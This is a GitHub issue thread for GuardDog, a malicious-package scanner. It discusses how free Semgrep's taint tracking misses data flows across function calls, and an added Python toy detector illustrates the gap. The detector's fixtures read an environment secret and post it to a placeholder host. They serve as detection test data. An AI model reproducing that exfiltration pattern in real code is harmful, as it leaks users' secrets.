DataDog / guarddog

:snake: :mag: GuardDog is a CLI tool to Identify malicious PyPI and npm packages
https://securitylabs.datadoghq.com/articles/guarddog-identify-malicious-pypi-packages/
Apache License 2.0

Document limitations of taint tracking #34

Open enelli opened 2 years ago

enelli commented 2 years ago

Deep Semgrep is needed to propagate values through function calls. An example of this is found in the exfiltrate-sensitive-data tests (ctx). It can also be seen here: https://semgrep.dev/s/enelli:exfiltrate-sensitive-data. The first case is not detected, but the second case that has only one function is caught.
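The limitation described in this comment, illustrated with a toy per-function taint checker (an added example, not GuardDog's or Semgrep's code). It assumes `os.environ[...]` as the taint source and `requests.post(...)` as the sink, and the two fixtures are constructed to mirror the two cases above: the cross-function flow is missed, the single-function flow is caught.

```python
import ast

# Assumed source/sink pair for this toy (not GuardDog's real rule):
# reading os.environ[...] taints data; passing it to requests.post(...) is the sink.
SOURCE = ("os", "environ")
SINK = ("requests", "post")

def _dotted(node):
    """Return ('a', 'b') for an expression `a.b`, else None."""
    if isinstance(node, ast.Attribute) and isinstance(node.value, ast.Name):
        return (node.value.id, node.attr)
    return None

def _is_tainted(expr, tainted):
    """Tainted if the expression reads os.environ[...] or a tainted local name.
    A call to another function is opaque: its result is never treated as tainted,
    which is exactly why the cross-function case below is missed."""
    for n in ast.walk(expr):
        if isinstance(n, ast.Subscript) and _dotted(n.value) == SOURCE:
            return True
        if isinstance(n, ast.Name) and n.id in tainted:
            return True
    return False

def _reaches_sink(node, tainted):
    """True if node is a requests.post(...) call fed a tainted argument."""
    if not (isinstance(node, ast.Call) and _dotted(node.func) == SINK):
        return False
    inputs = list(node.args) + [k.value for k in node.keywords]
    return any(_is_tainted(a, tainted) for a in inputs)

def find_intraprocedural_leaks(code):
    """Names of functions in which tainted data reaches the sink without
    crossing a call boundary; this is the scope a per-function taint mode has."""
    leaks = []
    for fn in ast.walk(ast.parse(code)):
        if not isinstance(fn, ast.FunctionDef):
            continue
        tainted = set()
        for stmt in fn.body:
            if isinstance(stmt, ast.Assign) and _is_tainted(stmt.value, tainted):
                tainted |= {t.id for t in stmt.targets if isinstance(t, ast.Name)}
            if any(_reaches_sink(c, tainted) for c in ast.walk(stmt)):
                leaks.append(fn.name)
                break
    return leaks

# Constructed fixtures mirroring the two cases in the issue.
CROSS_FUNCTION = """
def read_secret():
    return os.environ["SECRET"]
def send():
    requests.post("https://example.invalid/collect", data=read_secret())
"""
SAME_FUNCTION = """
def send():
    secret = os.environ["SECRET"]
    requests.post("https://example.invalid/collect", data=secret)
"""
```

Running `find_intraprocedural_leaks` on the two fixtures returns `[]` for `CROSS_FUNCTION` and `["send"]` for `SAME_FUNCTION`; propagating the return value of `read_secret` into `send` would need interprocedural analysis.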

christophetd commented 1 year ago

Renaming/labeling as this is not a bug but a documented limitation of the free version of Semgrep.